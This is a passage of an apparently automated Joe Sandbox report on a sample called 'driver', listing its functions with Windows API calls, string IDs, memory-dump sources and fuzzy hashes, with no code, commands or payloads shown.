                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00000017,00448C48,?,?,004339AD), ref: 00433E2B
                                                                                                                                                                    • LocalFree.KERNEL32(?,00000017,00448C48,?,?,004339AD), ref: 00433E94
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID: %s
                                                                                                                                                                    • API String ID: 1365068426-3542723749
                                                                                                                                                                    • Opcode ID: dbbe2f3d175d8c48e9f8e2c33d79c0cf687ef971426102b37edb380a283d97d0
                                                                                                                                                                    • Instruction ID: 9c6c7e39fc0223d28501e2bdda492651b36dad0077a08ab9767b9368a7df6654
                                                                                                                                                                    • Opcode Fuzzy Hash: dbbe2f3d175d8c48e9f8e2c33d79c0cf687ef971426102b37edb380a283d97d0
                                                                                                                                                                    • Instruction Fuzzy Hash: 29112F72B0435566F7315DB21CC3B6F768C8B19B56F142067FA44A9381E6EC8F0043AD
                                                                                                                                                                    Function 00441DA8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,___CPPdebugHook), ref: 00441DAF
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00441DB5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: TAD$___CPPdebugHook
                                                                                                                                                                    • API String ID: 1646373207-115868640
                                                                                                                                                                    • Opcode ID: 453bc89a802c45b40438483efa2133c43e2761ff990a5c08d91943df3544165f
                                                                                                                                                                    • Instruction ID: 8918a20b954b6648062407d2cc6c9b24a502c3bcaf4423ddf714cd55dfc51d56
                                                                                                                                                                    • Opcode Fuzzy Hash: 453bc89a802c45b40438483efa2133c43e2761ff990a5c08d91943df3544165f
                                                                                                                                                                    • Instruction Fuzzy Hash: E4C08CB08457408AF700BF329D5B72C3390A310F0BF80402FA0008E2A2CBFD8A8C861C
                                                                                                                                                                    Function 0043C628 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,___CPPdebugHook), ref: 0043C62F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0043C635
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: TAD$___CPPdebugHook
                                                                                                                                                                    • API String ID: 1646373207-115868640
                                                                                                                                                                    • Opcode ID: 9ca12162b3a097c18f5b6870bc2066a1d6215eea5ed684e71a702f27bfc6cc16
                                                                                                                                                                    • Instruction ID: 6555a35040d5d0ad104cf49bc2598f40a7ed823258bec267e48cbbd9476fc255
                                                                                                                                                                    • Opcode Fuzzy Hash: 9ca12162b3a097c18f5b6870bc2066a1d6215eea5ed684e71a702f27bfc6cc16
                                                                                                                                                                    • Instruction Fuzzy Hash: 48C0127065071049F7407F22589FB182150A310707F50902AA000551D6CA7D52458F4C
                                                                                                                                                                    Function 0042EA6C Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Z9C$s$@$tXD$wXD$yXD
                                                                                                                                                                    • API String ID: 0-3548953843
                                                                                                                                                                    • Opcode ID: 775d22441288ac35e507aa7cb76bd35d30fe7675d468933928b6d0937d4f8146
                                                                                                                                                                    • Instruction ID: 72c2496d5d1c3047a3b4ff6991fe7b487862a9e99cb8282eef049bb63910b261
                                                                                                                                                                    • Opcode Fuzzy Hash: 775d22441288ac35e507aa7cb76bd35d30fe7675d468933928b6d0937d4f8146
                                                                                                                                                                    • Instruction Fuzzy Hash: A2310931B0021597DF10A66BAC817AE77A4AF48314F54427BF905DB392EB7CDD0192AD
                                                                                                                                                                    Function 0043E5F8 Relevance: 6.2, APIs: 4, Instructions: 158COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 095d08c07c59d3c5da87e6cee6595dc3030dc454551f46ac6d716b1048195550
                                                                                                                                                                    • Instruction ID: 41ecbb4ca7572e08e3c5baa7d394ff573a8b86dc351530b4d07c623f0171db5c
                                                                                                                                                                    • Opcode Fuzzy Hash: 095d08c07c59d3c5da87e6cee6595dc3030dc454551f46ac6d716b1048195550
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D518534A01209EFDB20CF96C881BAE7775EF49315F20A76AF5214B2D0C7789D45CB59
                                                                                                                                                                    Function 004409C8 Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,00000002,?,00000000,?,?,00440B9A,00000000,?,?), ref: 004409E8
                                                                                                                                                                      • Part of subcall function 00440978: GetLocalTime.KERNEL32 ref: 0044097C
                                                                                                                                                                      • Part of subcall function 00440978: wsprintfA.USER32 ref: 004409B5
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002,00000080,00000000,00000002,?,00000000,?), ref: 00440A0A
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002,00000080), ref: 00440A1F
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002), ref: 00440A25
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Write$CloseCreateHandleLocalTimewsprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 893966949-0
                                                                                                                                                                    • Opcode ID: 6c03d1a197c17bd2975eadfa41d64bd020091b43e01215dfefb441dd93727a68
                                                                                                                                                                    • Instruction ID: e0d91f8e7a7282df01ac802fb6c210701cf6f9cb657dab4fe0fdf4963d7966fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c03d1a197c17bd2975eadfa41d64bd020091b43e01215dfefb441dd93727a68
                                                                                                                                                                    • Instruction Fuzzy Hash: 82F0B47624030479F6206AA69C47FAF635CDB41B69F20411FF700EA1C2DDB8BE0052BC
                                                                                                                                                                    Function 0040C254 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000080), ref: 0040C2B7
                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000,00000080), ref: 0040C2BD
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040C2C3
                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,00000000,00000080), ref: 0040C2C9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1171435874-0
                                                                                                                                                                    • Opcode ID: 9adaa23843f83776365ddf4ea9c028b510f169b5d1555b87a753a2b529a3ae24
                                                                                                                                                                    • Instruction ID: 725f8c2a54f69a1cfa43e73041d518ec7de461b947ccab1dfd91e1af0daa9fd6
                                                                                                                                                                    • Opcode Fuzzy Hash: 9adaa23843f83776365ddf4ea9c028b510f169b5d1555b87a753a2b529a3ae24
                                                                                                                                                                    • Instruction Fuzzy Hash: 48F06DA6D01A10D7EA2457D188C436E5148D716325F224BBFFE00FBED2C63C9D46229E
                                                                                                                                                                    Function 00433CA8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 28sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00001388,0043395A,?,004013E2), ref: 00433CCD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID: %s$%s$Z9C
                                                                                                                                                                    • API String ID: 3472027048-3223552781
                                                                                                                                                                    • Opcode ID: 2af2a1dd3f8674b443f0e955cb2157b9cf72ae222a0a6e457d8e7386cbbc7e58
                                                                                                                                                                    • Instruction ID: 37229b61aa5b5c3d6606c677752a86966b3e12c9ab471f6eebddaa0ac6a61d92
                                                                                                                                                                    • Opcode Fuzzy Hash: 2af2a1dd3f8674b443f0e955cb2157b9cf72ae222a0a6e457d8e7386cbbc7e58
                                                                                                                                                                    • Instruction Fuzzy Hash: 13E06561A8438836FF417B927C03FD93B588B5470EF58106BBD04285D3E5AD56ACC6AE
                                                                                                                                                                    Function 00430484 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00403234: CreateFileW.KERNEL32(00000000,80000000,?,00000000,00000003,?,00000000,?,004521B1,?), ref: 004032A8
                                                                                                                                                                      • Part of subcall function 00403234: GetLastError.KERNEL32(?,80000000,?,00000000,00000003,?,00000000,?,004521B1,?), ref: 004032CD
                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,00000001,00000001,00000001), ref: 004307E1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CreateErrorLastTime
                                                                                                                                                                    • String ID: 5$:
                                                                                                                                                                    • API String ID: 249741611-3926247037
                                                                                                                                                                    • Opcode ID: dfadf1652010161301e6d15ea1ce0ab0c23aea3dcfd49f330bc9b3760c845179
                                                                                                                                                                    • Instruction ID: 4845a81e12bbf0b32647cbe69b9c61398cc85db51134d799cda93aa8c09b75e8
                                                                                                                                                                    • Opcode Fuzzy Hash: dfadf1652010161301e6d15ea1ce0ab0c23aea3dcfd49f330bc9b3760c845179
                                                                                                                                                                    • Instruction Fuzzy Hash: 1391D4B09001185BEB24EB15CC91BDDB3AAAF48304F4451FFA408A6686DB7D9F858F69
                                                                                                                                                                    Function 00439D0C Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 70c2441db366d92ea7be1342b3bf629026ba92bb675f06e684bdd34511097434$DateMax: $VersMax: $Version:
                                                                                                                                                                    • API String ID: 0-1288699373
                                                                                                                                                                    • Opcode ID: dc30aa06cff3b0bb0f8a943b396716dad7f56885c2d609f38a60ac2c241e0948
                                                                                                                                                                    • Instruction ID: 1c9193dc80b18c5e58fb678d6dce924cb39240d5dec4d5f18c6a20b905f4f5fc
                                                                                                                                                                    • Opcode Fuzzy Hash: dc30aa06cff3b0bb0f8a943b396716dad7f56885c2d609f38a60ac2c241e0948
                                                                                                                                                                    • Instruction Fuzzy Hash: C7F14871F001544AEB24E675DC827AF72A59B4C304F10A4BFE549E73C2EA7C8D498B6E
                                                                                                                                                                    Function 0042FCC4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileSecurityW.ADVAPI32(00000000,00000007,?), ref: 0042FECC
                                                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,00000007,?), ref: 0042FED6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileSecurity
                                                                                                                                                                    • String ID: 5
                                                                                                                                                                    • API String ID: 200422441-2226203566
                                                                                                                                                                    • Opcode ID: 459ad0123a4c5932ca0865aefd334dac9fb4138fa3e4ac8cb9922e3e3759849d
                                                                                                                                                                    • Instruction ID: f6f05adc8cf9644d354ba94de0d3d4a3b0664c5a0b6203370b4da1046e5ca92a
                                                                                                                                                                    • Opcode Fuzzy Hash: 459ad0123a4c5932ca0865aefd334dac9fb4138fa3e4ac8cb9922e3e3759849d
                                                                                                                                                                    • Instruction Fuzzy Hash: E551E770A001185BEB14EB56DC417EE77B9DF44305F9440BBE808A7786D77C4E498B7A
                                                                                                                                                                    Function 0042BE18 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OemToCharBuffA.USER32(?,?,00000001), ref: 0042BFA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: BuffChar
                                                                                                                                                                    • String ID: [%c]%s$}UD
                                                                                                                                                                    • API String ID: 1973267554-1516837986
                                                                                                                                                                    • Opcode ID: 3389422e9aef64cf0ec7c6d0df8c3b484bdb001f71b349061f313581f3e838c5
                                                                                                                                                                    • Instruction ID: 510f4d794767f9334348231c8ed56aab172dc915568590adeb515da15b521e0b
                                                                                                                                                                    • Opcode Fuzzy Hash: 3389422e9aef64cf0ec7c6d0df8c3b484bdb001f71b349061f313581f3e838c5
                                                                                                                                                                    • Instruction Fuzzy Hash: 5351F371B001299FDF10DFA4E981AFEB7B1EF45304FA540AAE841E7241D738AE05CB99
                                                                                                                                                                    Function 004124EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • 70c2441db366d92ea7be1342b3bf629026ba92bb675f06e684bdd34511097434, xrefs: 0041267E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Char
                                                                                                                                                                    • String ID: 70c2441db366d92ea7be1342b3bf629026ba92bb675f06e684bdd34511097434
                                                                                                                                                                    • API String ID: 751630497-3642216007
                                                                                                                                                                    • Opcode ID: 50197230611323f188a59b081da6dfcc7ca684aa2b05d9f08a318f6d9ea1719c
                                                                                                                                                                    • Instruction ID: 74d08faa7013e07f68db9aebc306b473f36de9555eb39a2d73e24c7d42801b46
                                                                                                                                                                    • Opcode Fuzzy Hash: 50197230611323f188a59b081da6dfcc7ca684aa2b05d9f08a318f6d9ea1719c
                                                                                                                                                                    • Instruction Fuzzy Hash: CD51E871E0011C5ACB14DF65CD807DDB7B9AF84304F4440FEA509A7282EB795B59CBA9
                                                                                                                                                                    Function 004051A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00404404: GetFileAttributesW.KERNEL32(00000000,?,00000000,00402061), ref: 0040441E
                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 004052EA
                                                                                                                                                                      • Part of subcall function 00404404: GetFileAttributesA.KERNEL32(?,?,00000000,00402061), ref: 00404430
                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 0040532C
                                                                                                                                                                      • Part of subcall function 004033B0: CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000000,00000000,?,004521B1,?,00000000,?,0042B7EF,00000001,00000001,00000000), ref: 004033F6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
